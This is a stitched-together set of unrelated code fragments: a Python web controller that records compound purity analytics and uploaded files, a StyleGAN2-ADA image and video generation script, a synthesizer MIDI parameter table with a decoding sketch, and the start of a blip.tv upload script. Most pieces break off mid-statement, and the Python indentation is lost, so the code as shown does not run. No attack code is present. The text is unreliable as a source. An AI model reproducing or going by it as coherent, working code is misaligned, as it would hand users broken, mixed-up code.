redirect(request.headers['Referer'])
@expose('molgears.templates.users.synthesis.analitics')
def analitics(self, id, *kw):
pname = request.environ['PATH_INFO'].split('/')[1]
id = int(id)
userid = request.identity['repoze.who.userid']
scompound = DBSession.query( SCompound).filter_by(id=id).join(SCompound.mol).filter(Compound.project.any(Projects.name==pname)).first()
effort = DBSession.query( Efforts ).get(scompound.effort_default)
come_from = request.headers['Referer']
if scompound.owner == userid:
etap_max = effort.etap_max
etap = effort.etap
if etap == (etap_max - 1):
flash(u'Please wait for saving.', 'warning')
return dict(scompound=scompound, kierownik = None, come_from=come_from, page='synthesis', pname=pname)
else:
flash(l_(u'This is not the last etap'), 'error')
redirect('/%s/synthesis' % pname)
else:
flash(l_(u'Permission denied'), 'error')
redirect(request.headers['Referer'])
@expose('')
def save_analitics(self, id, **kw):
pname = request.environ['PATH_INFO'].split('/')[1]
id = int(id)
userid = request.identity['repoze.who.userid']
shistory = SHistory()
shistory.project = pname
shistory.date = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
shistory.user = userid
shistory.status = 'Analytics'
scompound = DBSession.query( SCompound).filter_by(id=id).join(SCompound.mol).filter(Compound.project.any(Projects.name==pname)).first()
shistory.gid = scompound.mol.gid
effort = DBSession.query( Efforts ).get(scompound.effort_default)
schanges = u''
if not (effort.etap < effort.etap_max):
            flash(l_(u'Etap number error'), 'error') # Error: phase greater than or equal to the maximum number of phases. Analytics have probably already been added.
redirect('/%s/synthesis' % pname)
etap = effort.etap
next_status = DBSession.query( SStatus ).get(3)
if not scompound.purity:
try:
kwas = str(kw['kwas'])
kwas = kwas.replace(',', '.')
kwas = float(kwas)
zasada = str(kw['zasada'])
zasada = zasada.replace(',', '.')
zasada = float(zasada)
except Exception as msg:
kwas = None
zasada = None
flash(l_(u'Purity error. Float required: %s' % msg), 'error')
redirect(request.headers['Referer'])
            if kwas >= 0 or zasada >= 0:
schanges = u'Current phase: ' + str(etap + 1) + u'; Status: ' + str(next_status.name)
if kwas >= 0:
spurity1 = SPurity()
spurity1.value = kwas
spurity1.type = 'acid'
schanges += u'; Acid purity: ' + kw['kwas']
if kw.has_key('retention_kwas') and kw['retention_kwas'] != u'':
retention_kwas = str(kw['retention_kwas']).replace(',', '.')
spurity1.retention_time = float(retention_kwas)
schanges += u'; Retention time (acid): ' + retention_kwas
scompound.purity += [spurity1]
try:
kwas_file = raw_path_basename(kw['kwas_file'].filename)
except Exception as msg:
kwas_file = None
pass
if kwas_file and userid:
number = DBSession.query(SFiles).count() + 1
new_kwas_file_name = str(number) + '_' + userid + '_' + str(id) + '_' + kwas_file
new_kwas_file_name.replace(' ', '_')
f_path = os.path.join(files_dir, new_kwas_file_name)
try:
f = file(f_path, "w")
f.write(kw['kwas_file'].value)
f.close()
except Exception as msg:
flash(l_(msg), 'error')
redirect(request.headers['Referer'])
sfile1 = SFiles()
sfile1.name = kwas_file
sfile1.filename = new_kwas_file_name
schanges += u'; Acid analytics: ' + kwas_file + u' (' + new_kwas_file_name + u')'
spurity1.filename = [sfile1]
else:
sfile1 = None
else:
spurity1 = None
if zasada >= 0:
spurity2 = SPurity()
spurity2.value = zasada
spurity2.type = 'basic'
schanges += u'; Basic purity: ' + str(kw['zasada'])
if kw.has_key('retention_zasada') and kw['retention_zasada'] != u'':
retention_zasada = str(kw['retention_zasada']).replace(',', '.')
spurity2.retention_time = float(retention_zasada)
schanges += u'; Retention time (basic): ' + retention_zasada
scompound.purity += [spurity2]
try:
zasada_file = raw_path_basename(kw['zasada_file'].filename)
except Exception as msg:
zasada_file = None
pass
if zasada_file and userid:
number = DBSession.query(SFiles).count() + 1
new_zasada_file_name = str(number) + '_' + userid + '_' + str(id) + '_' + zasada_file
new_zasada_file_name.replace(' ', '_')
f_path = os.path.join(files_dir, new_zasada_file_name)
try:
f = file(f_path, "w")
f.write(kw['zasada_file'].value)
f.close()
except Exception as msg:
flash(l_(msg), 'error')
redirect(request.headers['Referer'])
sfile2 = SFiles()
sfile2.name = zasada_file
sfile2.filename = new_zasada_file_name
                        schanges += u'; Basic analytics: ' + zasada_file + ' (' + new_zasada_file_name +')'
spurity2.filename = [sfile2]
else:
sfile2 = None
else:
spurity2 = None
else:
flash(l_(u'Acid or Basic purity is required'), 'error')
redirect(request.headers['Referer'])
else:
spurity2 = None
spurity1 = None
if not kw['lso']:
flash(l_(u'LSO is required'), 'error')
redirect(request.headers['Referer'])
if kw.has_key('lso') and kw['lso'] != u'' and kw['lso'].upper() != scompound.lso:
scompound.lso = kw['lso'].upper()
schanges += u' LSO: ' + kw['lso']
if kw.has_key('form') and kw['form'] != scompound.form:
scompound.form = kw['form']
schanges += u'; Form: ' + kw['form']
if kw.has_key('state') and kw['state'] | |
<reponame>wenhaoyong/stylegan2-ada-pytorch
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# NVIDIA CORPORATION and its licensors retain all intellectual property
# and proprietary rights in and to this software, related documentation
# and any modifications thereto. Any use, reproduction, disclosure or
# distribution of this software and related documentation without an express
# license agreement from NVIDIA CORPORATION is strictly prohibited.
"""Generate images using pretrained network pickle."""
import os
from typing import List, Optional, Union, Tuple
import click
import dnnlib
from torch_utils.gen_utils import num_range, parse_fps, compress_video, double_slowdown, \
make_run_dir, z_to_img, w_to_img, get_w_from_file, create_image_grid, save_config, parse_slowdown, get_w_from_seed
import scipy
import numpy as np
import PIL.Image
import torch
import legacy
os.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = 'hide'
import moviepy.editor
# ----------------------------------------------------------------------------
# We group the different types of generation (images, grid, video, wacky stuff) into a main function
@click.group()
def main():
pass
# ----------------------------------------------------------------------------
@main.command(name='images')
@click.pass_context
@click.option('--network', 'network_pkl', help='Network pickle filename', required=True)
@click.option('--recreate-snapshot-grid', 'training_snapshot', is_flag=True, help='Add flag if you wish to recreate the snapshot grid created during training')
@click.option('--snapshot-size', type=click.Choice(['1080p', '4k', '8k']), help='Size of the snapshot', default='4k', show_default=True)
@click.option('--seeds', type=num_range, help='List of random seeds')
@click.option('--trunc', 'truncation_psi', type=float, help='Truncation psi', default=1, show_default=True)
@click.option('--class', 'class_idx', type=int, help='Class label (unconditional if not specified)')
@click.option('--noise-mode', help='Noise mode', type=click.Choice(['const', 'random', 'none']), default='const', show_default=True)
@click.option('--projected-w', help='Projection result file; can be either .npy or .npz files', type=click.Path(exists=True, dir_okay=False), metavar='FILE')
@click.option('--save-grid', help='Use flag to save image grid', is_flag=True, show_default=True)
@click.option('--grid-width', '-gw', type=int, help='Grid width (number of columns)', default=None)
@click.option('--grid-height', '-gh', type=int, help='Grid height (number of rows)', default=None)
@click.option('--outdir', type=click.Path(file_okay=False), help='Directory path to save the results', default=os.path.join(os.getcwd(), 'out'), show_default=True, metavar='DIR')
@click.option('--description', '-desc', type=str, help='Description name for the directory path to save results', default='generate-images', show_default=True)
def generate_images(
ctx: click.Context,
network_pkl: str,
training_snapshot: bool,
snapshot_size: str,
seeds: Optional[List[int]],
truncation_psi: float,
noise_mode: str,
save_grid: bool,
grid_width: int,
grid_height: int,
outdir: str,
description: str,
class_idx: Optional[int],
projected_w: Optional[Union[str, os.PathLike]]
):
"""Generate images using pretrained network pickle.
Examples:
\b
# Generate curated MetFaces images without truncation (Fig.10 left)
python generate.py generate-images --trunc=1 --seeds=85,265,297,849 \\
--network=https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/metfaces.pkl
\b
# Generate uncurated MetFaces images with truncation (Fig.12 upper left)
python generate.py generate-images --trunc=0.7 --seeds=600-605 \\
--network=https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/metfaces.pkl
\b
# Generate class conditional CIFAR-10 images (Fig.17 left, Car)
python generate.py generate-images --seeds=0-35 --class=1 \\
--network=https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/cifar10.pkl
\b
# Render an image from projected W
python generate.py generate-images --projected_w=projected_w.npz \\
--network=https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/metfaces.pkl
"""
print(f'Loading networks from "{network_pkl}"...')
device = torch.device('cuda')
with dnnlib.util.open_url(network_pkl) as f:
G = legacy.load_network_pkl(f)['G_ema'].to(device) # type: ignore
description = 'generate-images' if len(description) == 0 else description
# Create the run dir with the given name description
run_dir = make_run_dir(outdir, description)
# Synthesize the result of a W projection.
if projected_w is not None:
if seeds is not None:
print('warn: --seeds is ignored when using --projected-w')
print(f'Generating images from projected W "{projected_w}"')
ws, ext = get_w_from_file(projected_w, return_ext=True)
ws = torch.tensor(ws, device=device)
assert ws.shape[1:] == (G.num_ws, G.w_dim)
n_digits = int(np.log10(len(ws))) + 1 # number of digits for naming the .jpg images
if ext == '.npy':
img = w_to_img(G, ws, noise_mode)[0]
PIL.Image.fromarray(img, 'RGB').save(f'{run_dir}/proj.jpg')
else:
for idx, w in enumerate(ws):
img = w_to_img(G, w, noise_mode)[0]
PIL.Image.fromarray(img, 'RGB').save(f'{run_dir}/proj{idx:0{n_digits}d}.jpg')
return
# Labels.
label = torch.zeros([1, G.c_dim], device=device)
if G.c_dim != 0:
if class_idx is None:
ctx.fail('Must specify class label with --class when using a conditional network')
label[:, class_idx] = 1
else:
if class_idx is not None:
print('warn: --class=lbl ignored when running on an unconditional network')
if training_snapshot:
# Note: this doesn't really work, so more work is warranted
print('Recreating the snapshot grid...')
size_dict = {'1080p': (1920, 1080, 3, 2), '4k': (3840, 2160, 7, 4), '8k': (7680, 4320, 7, 4)}
grid_width = int(np.clip(size_dict[snapshot_size][0] // G.img_resolution, size_dict[snapshot_size][2], 32))
grid_height = int(np.clip(size_dict[snapshot_size][1] // G.img_resolution, size_dict[snapshot_size][3], 32))
num_images = grid_width * grid_height
rnd = np.random.RandomState(0)
torch.manual_seed(0)
all_indices = list(range(70000)) # irrelevant
rnd.shuffle(all_indices)
grid_z = rnd.randn(num_images, G.z_dim) # TODO: generate with torch, as in the training_loop.py file
grid_img = z_to_img(G, torch.from_numpy(grid_z).to(device), label, truncation_psi, noise_mode)
PIL.Image.fromarray(create_image_grid(grid_img, (grid_width, grid_height)),
'RGB').save(os.path.join(run_dir, 'fakes.jpg'))
print('Saving individual images...')
for idx, z in enumerate(grid_z):
z = torch.from_numpy(z).unsqueeze(0).to(device)
w = G.mapping(z, None) # to save the dlatent in .npy format
img = z_to_img(G, z, label, truncation_psi, noise_mode)[0]
PIL.Image.fromarray(img, 'RGB').save(os.path.join(run_dir, f'img{idx:04d}.jpg'))
np.save(os.path.join(run_dir, f'img{idx:04d}.npy'), w.unsqueeze(0).cpu().numpy())
else:
if seeds is None:
ctx.fail('--seeds option is required when not using --projected-w')
# Generate images.
images = []
for seed_idx, seed in enumerate(seeds):
print('Generating image for seed %d (%d/%d) ...' % (seed, seed_idx, len(seeds)))
z = torch.from_numpy(np.random.RandomState(seed).randn(1, G.z_dim)).to(device)
img = z_to_img(G, z, label, truncation_psi, noise_mode)[0]
if save_grid:
images.append(img)
PIL.Image.fromarray(img, 'RGB').save(os.path.join(run_dir, f'seed{seed:04d}.jpg'))
if save_grid:
print('Saving image grid...')
# We let the function infer the shape of the grid
if (grid_width, grid_height) == (None, None):
PIL.Image.fromarray(create_image_grid(np.array(images)),
'RGB').save(os.path.join(run_dir, 'grid.jpg'))
# The user tells the specific shape of the grid, but one value may be None
else:
PIL.Image.fromarray(create_image_grid(np.array(images), (grid_width, grid_height)),
'RGB').save(os.path.join(run_dir, 'grid.jpg'))
# Save the configuration used
ctx.obj = {
'network_pkl': network_pkl,
'training_snapshot': training_snapshot,
'snapshot_size': snapshot_size,
'seeds': seeds,
'truncation_psi': truncation_psi,
'class_idx': class_idx,
'noise_mode': noise_mode,
'save_grid': save_grid,
'grid_width': grid_width,
'grid_height': grid_height,
'run_dir': run_dir,
'description': description,
'projected_w': projected_w
}
save_config(ctx=ctx, run_dir=run_dir)
# ----------------------------------------------------------------------------
def _parse_new_center(s: str) -> Tuple[str, Union[int, np.ndarray]]:
"""Get a new center for the W latent space (a seed or projected dlatent; to be transformed later)"""
try:
new_center = int(s) # it's a seed
return s, new_center
except ValueError:
new_center = get_w_from_file(s) # it's a projected dlatent
return s, new_center
@main.command(name='random-video')
@click.pass_context
@click.option('--network', 'network_pkl', help='Network pickle filename', required=True)
@click.option('--seeds', type=num_range, help='List of random seeds', required=True)
@click.option('--trunc', 'truncation_psi', type=float, help='Truncation psi', default=1, show_default=True)
@click.option('--new-center', type=_parse_new_center, help='New center for the W latent space; a seed (int) or a path to a projected dlatent (.npy/.npz)', default=None)
@click.option('--class', 'class_idx', type=int, help='Class label (unconditional if not specified)')
@click.option('--noise-mode', help='Noise mode', type=click.Choice(['const', 'random', 'none']), default='const', show_default=True)
@click.option('--grid-width', '-gw', type=int, help='Video grid width / number of columns', default=None, show_default=True)
@click.option('--grid-height', '-gh', type=int, help='Video grid height / number of rows', default=None, show_default=True)
@click.option('--slowdown', type=parse_slowdown, help='Slow down the video by this amount; will be approximated to the nearest power of 2', default='1', show_default=True)
@click.option('--duration-sec', '-sec', type=float, help='Duration length of the video', default=30.0, show_default=True)
@click.option('--fps', type=parse_fps, help='Video FPS.', default=30, show_default=True)
@click.option('--compress', is_flag=True, help='Add flag to compress the final mp4 file with ffmpeg-python (same resolution, lower file size)')
@click.option('--outdir', type=click.Path(file_okay=False), help='Directory path to save the results', default=os.path.join(os.getcwd(), 'out'), show_default=True, metavar='DIR')
@click.option('--description', '-desc', type=str, help='Description name for the directory path to save results', default='', show_default=True)
def random_interpolation_video(
ctx: click.Context,
network_pkl: Union[str, os.PathLike],
seeds: Optional[List[int]],
truncation_psi: float,
new_center: Tuple[str, Union[int, np.ndarray]],
class_idx: Optional[int],
noise_mode: str,
grid_width: int,
grid_height: int,
slowdown: int,
duration_sec: float,
fps: int,
outdir: Union[str, os.PathLike],
description: str,
compress: bool,
smoothing_sec: Optional[float] = 3.0 # for Gaussian blur; won't be a parameter, change at own risk
):
"""
Generate a random interpolation video using a pretrained network.
Examples:
\b
# Generate a 30-second long, untruncated MetFaces video at 30 FPS (3 rows and 2 columns; horizontal):
python generate.py random-video --seeds=0-5 \\
--network=https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/metfaces.pkl
\b
# Generate a 60-second long, truncated 1x2 MetFaces video at 60 FPS (2 rows and 1 column; vertical):
python generate.py random-video --trunc=0.7 --seeds=10,20 --grid-width=1 --grid-height=2 \\
--fps=60 -sec=60 --network=https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/metfaces.pkl
"""
print(f'Loading networks from "{network_pkl}"...')
device = torch.device('cuda')
with dnnlib.util.open_url(network_pkl) as f:
G = legacy.load_network_pkl(f)['G_ema'].to(device) # type: ignore
# Create the run dir with the given name description; add slowdown if different than the default (1)
description = 'random-video' if len(description) == 0 else description
description = f'{description}-{slowdown}xslowdown' if slowdown != 1 else description
run_dir = make_run_dir(outdir, description)
# Number of frames in the video and its total duration in seconds
num_frames = int(np.rint(duration_sec * fps))
total_duration = duration_sec * slowdown
print('Generating latent vectors...')
# TODO: let another helper function handle each case, we will use it for the grid
# If there's more than one seed provided and the shape isn't specified by the user
if (grid_width is None and grid_height is None) and len(seeds) >= 1:
# TODO: this can be done by another function
# Number of images in the grid video according to the seeds provided
num_seeds = len(seeds)
# Get the grid width and height according to num, giving priority to the number of columns
grid_width = max(int(np.ceil(np.sqrt(num_seeds))), 1)
grid_height = max((num_seeds - 1) // grid_width + 1, 1)
grid_size = (grid_width, grid_height)
shape = [num_frames, G.z_dim] # This is per seed
# Get the z latents
all_latents = | |
0~19 | DELAY SUB TYPE *note P17 |
+---------+-------+---------+---------------------------------------------+
| 101 | L:0~7 | 0~1023 | DELAY TIME |
| 102 | H:0~1 | | |
+---------+-------+---------+---------------------------------------------+
| 103 | L:0~7 | 0~1023 | DELAY DEPTH |
| 104 | H:0~1 | | |
+---------+-------+---------+---------------------------------------------+
| 105 | | 0,1 | REVERB ON/OFF 0,1=Off,On |
+---------+-------+---------+---------------------------------------------+
| 106 | | 0~19 | REVERB SUB TYPE *note P18 |
+---------+-------+---------+---------------------------------------------+
| 107 | L:0~7 | 0~1023 | REVERB TIME |
| 108 | H:0~1 | | |
+---------+-------+---------+---------------------------------------------+
| 109 | L:0~7 | 0~1023 | REVERB DEPTH |
| 110 | H:0~1 | | |
+---------+-------+---------+---------------------------------------------+
| 111 | | 0~12 | BEND RANGE (+) OFF~+12Note |
+---------+-------+---------+---------------------------------------------+
| 112 | | 0~12 | BEND RANGE (-) OFF~-12Note |
+---------+-------+---------+---------------------------------------------+
| 113 | | 0~28 | JOYSTICK ASSIGN (+) *note P19 |
+---------+-------+---------+---------------------------------------------+
| 114 | | 0~200 | JOYSTICK RANGE (+) 0~200=-100%~+100% |
+---------+-------+---------+---------------------------------------------+
| 115 | | 0~28 | JOYSTICK ASSIGN (-) *note P19 |
+---------+-------+---------+---------------------------------------------+
| 116 | | 0~200 | JOYSTICK RANGE (-) 0~200=-100%~+100% |
+---------+-------+---------+---------------------------------------------+
| 117 | | 0~2 | CV IN MODE *note P20 |
+---------+-------+---------+---------------------------------------------+
| 118 | | 0~28 | CV IN 1 ASSIGN (+) *note P19 |
+---------+-------+---------+---------------------------------------------+
| 119 | | 0~200 | CV IN 1 RANGE (+) 0~200=-100%~+100% |
+---------+-------+---------+---------------------------------------------+
| 120 | | 0~28 | CV IN 2 ASSIGN (-) *note P19 |
+---------+-------+---------+---------------------------------------------+
| 121 | | 0~200 | CV IN 2 RANGE (-) 0~200=-100%~+100% |
+---------+-------+---------+---------------------------------------------+
| 122 | | 0~139 | MICRO TUNING *note P21 |
+---------+-------+---------+---------------------------------------------+
| 123 | | 0~24 | SCALE KEY 0~24=-12Note~+12Note |
+---------+-------+---------+---------------------------------------------+
| 124 | | 0~100 | PROGRAM TUNING 0~100=-50Cent~+50Cent |
+---------+-------+---------+---------------------------------------------+
| 125 | | 0,1 | LFO KEY SYNC 0,1=Off,On |
+---------+-------+---------+---------------------------------------------+
| 126 | | 0,1 | LFO VOICE SYNC 0,1=Off,On |
+---------+-------+---------+---------------------------------------------+
| 127 | | 0~3 | LFO TARGET OSC *note P22 |
+---------+-------+---------+---------------------------------------------+
| 128 | | 0~127 | CUTOFF VELOCITY |
+---------+-------+---------+---------------------------------------------+
| 129 | | 0~127 | AMP VELOCITY |
+---------+-------+---------+---------------------------------------------+
| 130 | | 0~3 | MULTI OCTAVE 0~3=16',8',4',2' |
+---------+-------+---------+---------------------------------------------+
| 131 | | 0,1 | MULTI ROUTING 0,1=Pre VCF, Post VCF |
+---------+-------+---------+---------------------------------------------+
| 132 | | 0,1 | EG LEGATO 0,1=Off,On |
+---------+-------+---------+---------------------------------------------+
| 133 | | 0,1 | PORTAMENTO MODE 0,1=Auto,On |
+---------+-------+---------+---------------------------------------------+
| 134 | | 0,1 | PORTAMENTO BPM SYNC 0,1=Off,On |
+---------+-------+---------+---------------------------------------------+
| 135 | | 12~132 | PROGRAM LEVEL 12~132=-18dB~+6dB |
+---------+-------+---------+---------------------------------------------+
| 136 | | 0~200 | VPM PARAM1 (Feedback) 0~200=-100%~+100% |
+---------+-------+---------+---------------------------------------------+
| 137 | | 0~200 | VPM PARAM2 (Noise Depth) 0~200=-100%~+100% |
+---------+-------+---------+---------------------------------------------+
| 138 | | 0~200 | VPM PARAM3 (ShapeModInt) 0~200=-100%~+100% |
+---------+-------+---------+---------------------------------------------+
| 139 | | 0~200 | VPM PARAM4 (Mod Attack) 0~200=-100%~+100% |
+---------+-------+---------+---------------------------------------------+
| 140 | | 0~200 | VPM PARAM5 (Mod Decay) 0~200=-100%~+100% |
+---------+-------+---------+---------------------------------------------+
| 141 | | 0~200 | VPM PARAM6 (ModKeyTrack) 0~200=-100%~+100% |
+---------+-------+---------+---------------------------------------------+
| 142 | | | USER PARAM1 *note P23 |
+---------+-------+---------+---------------------------------------------+
| 143 | | | USER PARAM2 *note P23 |
+---------+-------+---------+---------------------------------------------+
| 144 | | | USER PARAM3 *note P23 |
+---------+-------+---------+---------------------------------------------+
| 145 | | | USER PARAM4 *note P23 |
+---------+-------+---------+---------------------------------------------+
| 146 | | | USER PARAM5 *note P23 |
+---------+-------+---------+---------------------------------------------+
| 147 | | | USER PARAM6 *note P23 |
+---------+-------+---------+---------------------------------------------+
| 148 | 0~1 | | USER PARAM5 TYPE *note P24 |
| | 2~3 | | USER PARAM6 TYPE *note P24 |
| | 4~5 | | Reserved |
| | 6~7 | | Reserved |
+---------+-------+---------+---------------------------------------------+
| 149 | 0~1 | | USER PARAM1 TYPE *note P24 |
| | 2~3 | | USER PARAM2 TYPE *note P24 |
| | 4~5 | | USER PARAM3 TYPE *note P24 |
| | 6~7 | | USER PARAM4 TYPE *note P24 |
+---------+-------+---------+---------------------------------------------+
| 150 | | 1~25 | PROGRAM TRANSPOSE -12~+12 Note |
+---------+-------+---------+---------------------------------------------+
| 151 | L:0~7 | 0~1024 | DELAY DRY WET |
| 152 | H:0~1 | | |
+---------+-------+---------+---------------------------------------------+
| 153 | L:0~7 | 0~1024 | REVERB DRY WET |
| 154 | H:0~1 | | |
+---------+-------+---------+---------------------------------------------+
| 155 | | 0~28 | MIDI AFTER TOUCH ASSIGN *note P19 |
+---------+-------+---------+---------------------------------------------+
| 156~159 | | ASCII | 'PRED' |
+---------+-------+---------+---------------------------------------------+
| 160~161 | | ASCII | 'SQ' *note S1 |
+---------+-------+---------+---------------------------------------------+
| 162 | 0 | 0,1 | Step 1 Active Step Off/On 0,1=Off,On |
| 162 | 1 | 0,1 | Step 2 Active Step Off/On 0,1=Off,On |
| 162 | 2 | 0,1 | Step 3 Active Step Off/On 0,1=Off,On |
| 162 | 3 | 0,1 | Step 4 Active Step Off/On 0,1=Off,On |
| 162 | 4 | 0,1 | Step 5 Active Step Off/On 0,1=Off,On |
| 162 | 5 | 0,1 | Step 6 Active Step Off/On 0,1=Off,On |
| 162 | 6 | 0,1 | Step 7 Active Step Off/On 0,1=Off,On |
| 162 | 7 | 0,1 | Step 8 Active Step Off/On 0,1=Off,On |
+---------+-------+---------+---------------------------------------------+
| 163 | 0 | 0,1 | Step 9 Active Step Off/On 0,1=Off,On |
| 163 | 1 | 0,1 | Step 10 Active Step Off/On 0,1=Off,On |
| 163 | 2 | 0,1 | Step 11 Active Step Off/On 0,1=Off,On |
| 163 | 3 | 0,1 | Step 12 Active Step Off/On 0,1=Off,On |
| 163 | 4 | 0,1 | Step 13 Active Step Off/On 0,1=Off,On |
| 163 | 5 | 0,1 | Step 14 Active Step Off/On 0,1=Off,On |
| 163 | 6 | 0,1 | Step 15 Active Step Off/On 0,1=Off,On |
| 163 | 7 | 0,1 | Step 16 Active Step Off/On 0,1=Off,On |
+---------+-------+---------+---------------------------------------------+
| 164 | L:0~7 |100~3000 | BPM 100~3000=10.0~300.0 |
| 165 | H:0~3 | | |
+---------+-------+---------+---------------------------------------------+
| 166 | | 1~16 | Step Length |
+---------+-------+---------+---------------------------------------------+
| 167 | | 0~4 | Step Resolution 0~4 = 1/16,1/8,1/4,1/2,1/1 |
+---------+-------+---------+---------------------------------------------+
| 168 | | -75~+75 | Swing |
+---------+-------+---------+---------------------------------------------+
| 169 | | 0~72 | Default Gate Time 0~72=0%~100% |
+---------+-------+---------+---------------------------------------------+
| 170 | 0 | 0,1 | Step 1 Off/On 0,1=Off,On |
| 170 | 1 | 0,1 | Step 2 Off/On 0,1=Off,On |
| 170 | 2 | 0,1 | Step 3 Off/On 0,1=Off,On |
| 170 | 3 | 0,1 | Step 4 Off/On 0,1=Off,On |
| 170 | 4 | 0,1 | Step 5 Off/On 0,1=Off,On |
| 170 | 5 | 0,1 | Step 6 Off/On 0,1=Off,On |
| 170 | 6 | 0,1 | Step 7 Off/On 0,1=Off,On |
| 170 | 7 | 0,1 | Step 8 Off/On 0,1=Off,On |
+---------+-------+---------+---------------------------------------------+
| 171 | 0 | 0,1 | Step 9 Off/On 0,1=Off,On |
| 171 | 1 | 0,1 | Step 10 Off/On 0,1=Off,On |
| 171 | 2 | 0,1 | Step 11 Off/On 0,1=Off,On |
| 171 | 3 | 0,1 | Step 12 Off/On 0,1=Off,On |
| 171 | 4 | 0,1 | Step 13 Off/On 0,1=Off,On |
| 171 | 5 | 0,1 | Step 14 Off/On 0,1=Off,On |
| 171 | 6 | 0,1 | Step 15 Off/On 0,1=Off,On |
| 171 | 7 | 0,1 | Step 16 Off/On 0,1=Off,On |
+---------+-------+---------+---------------------------------------------+
| 172 | 0 | 0,1 | Step 1 Motion Off/On 0,1=Off,On |
| 172 | 1 | 0,1 | Step 2 Motion Off/On 0,1=Off,On |
| 172 | 2 | 0,1 | Step 3 Motion Off/On 0,1=Off,On |
| 172 | 3 | 0,1 | Step 4 Motion Off/On 0,1=Off,On |
| 172 | 4 | 0,1 | Step 5 Motion Off/On 0,1=Off,On |
| 172 | 5 | 0,1 | Step 6 Motion Off/On 0,1=Off,On |
| 172 | 6 | 0,1 | Step 7 Motion Off/On 0,1=Off,On |
| 172 | 7 | 0,1 | Step 8 Motion Off/On 0,1=Off,On |
+---------+-------+---------+---------------------------------------------+
| 173 | 0 | 0,1 | Step 9 Motion Off/On 0,1=Off,On |
| 173 | 1 | 0,1 | Step 10 Motion Off/On 0,1=Off,On |
| 173 | 2 | 0,1 | Step 11 Motion Off/On 0,1=Off,On |
| 173 | 3 | 0,1 | Step 12 Motion Off/On 0,1=Off,On |
| 173 | 4 | 0,1 | Step 13 Motion Off/On 0,1=Off,On |
| 173 | 5 | 0,1 | Step 14 Motion Off/On 0,1=Off,On |
| 173 | 6 | 0,1 | Step 15 Motion Off/On 0,1=Off,On |
| 173 | 7 | 0,1 | Step 16 Motion Off/On 0,1=Off,On |
+---------+-------+---------+---------------------------------------------+
| 174~175 | | | Motion Slot 1 Parameter *note S2 |
+---------+-------+---------+---------------------------------------------+
| 176~177 | | | Motion Slot 2 Parameter *note S2 |
+---------+-------+---------+---------------------------------------------+
| 178~179 | | | Motion Slot 3 Parameter *note S2 |
+---------+-------+---------+---------------------------------------------+
| 180~181 | | | Motion Slot 4 Parameter *note S2 |
+---------+-------+---------+---------------------------------------------+
| 182 | 0 | | | |
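A minimal decoding sketch (illustrative only, not part of the MIDI implementation document):
assuming `data` holds the program data bytes laid out exactly as in the table above, the split
L/H fields and the packed per-step bit flags can be read as follows.

    data = bytes(256)  # placeholder buffer standing in for a real program dump

    def read_u10(lo_offset, hi_offset):
        # 10-bit value split across a low byte (bits 0~7) and a high byte (bits 0~1),
        # e.g. DELAY TIME at offsets 101 (L) and 102 (H), range 0~1023
        return data[lo_offset] | ((data[hi_offset] & 0x03) << 8)

    def step_active(step):
        # Active Step flags are packed one bit per step: offset 162 covers steps 1~8, 163 covers 9~16
        byte = data[162 + (step - 1) // 8]
        return bool((byte >> ((step - 1) % 8)) & 1)

    delay_time = read_u10(101, 102)      # 0~1023
    reverb_depth = read_u10(109, 110)    # 0~1023
    step5_on = step_active(5)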
<reponame>CarlFK/veyepar
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2008 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""@brief Upload videos to blip.tv or update blip.tv posts
This script can be used to post videos to blip.tv, or to upload additional
formats for existing posts, or to change the description of existing posts.
The script uses the blip.tv "REST Upload API". See http://blip.tv/about/api/.
blip.tv uses item IDs to identify videos. For the video at
http://blip.tv/file/123456, the item ID is "123456". The code refers to
this ID as "video_id".
user/password will be prompted for if not passed.
Usage:
@code
blip_uploader.py --help
# Upload new video:
blip_uploader.py -f new_video.mpg -t "My Great Video"
# Upload alternate format to existing post:
blip_uploader.py -v 123456 -f alternate_format.ogg -n 1 -r Web
@endcode
A Blip Episode can be created from just a Title and 1 File - a thumbnail
will be generated and the default license applied.
Everything else is optional:
description, categories, additional formats, nsfw, topics
This script will let you create and update Episodes.
The creation requires a file, the script will create a Title
from the filename. After that all attributes replace the current values.
"""
import optparse
import configparser
import getpass
import http.client, socket
import mimetypes
import os
import datetime,time
import re
import sys
import urllib.request, urllib.error, urllib.parse
import urllib.parse
import xml.etree.ElementTree
import xml.dom.minidom
import xml.sax.saxutils
import json
import cgi
def stot(seconds):
# convert numeric seconds to hh:mm:ss time string
s=seconds
h,s=divmod(s,3600)
m,s=divmod(s,60)
t="%02i:%02i:%02i" % (h,m,s)
return t
class Blip(object):
# BLIP_UPLOAD_URL = "http://blip.tv/file/post"
BLIP_UPLOAD_URL = "http://uploads.blip.tv/file/post"
# While both URLs will currently work, future applications should use uploads.blip.tv.
MULTIPART_BOUNDARY = "-----------$$SomeFancyBoundary$$"
debug=True
def progress(self, current, total):
"""
Hook method for letting the user see upload progress.
"""
pass
